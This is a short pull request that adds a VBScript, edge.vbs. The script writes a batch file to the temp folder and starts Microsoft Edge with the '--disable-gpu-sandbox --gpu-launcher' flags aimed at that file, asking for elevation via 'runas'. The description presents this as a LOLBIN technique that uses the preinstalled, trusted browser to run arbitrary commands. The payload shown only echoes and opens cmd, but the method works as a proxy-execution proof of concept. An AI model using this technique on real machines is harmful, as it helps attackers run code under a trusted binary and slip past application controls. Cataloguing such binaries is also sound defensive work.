### PR TITLE
M$ Edge can do the same thing

### DIFF
--- a/edge.vbs
+++ b/edge.vbs
@@ -1,0 +1,11 @@
+Set FSO = CreateObject("Scripting.FileSystemObject")
+Set Shell = CreateObject("WScript.Shell")
+Set App = CreateObject("Shell.Application")
+
+Temp = Shell.expandEnvironmentStrings("%temp%") + "\payload.bat"
+Payload = "echo :) && cmd"
+
+Set File = FSO.CreateTextFile(Temp, true)
+File.WriteLine(Payload)
+
+App.ShellExecute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "--disable-gpu-sandbox --gpu-launcher=" + Temp, , "runas"


### PR DESCRIPTION
Because the new M$ Edge is based on Chromium, it can _also_ be used as a LOLBAS/LOLBIN for the same purpose.
Additionally, as it is preinstalled on all Windows 10 and 11 machines, it is likely to be on most Windows computers.
Thanks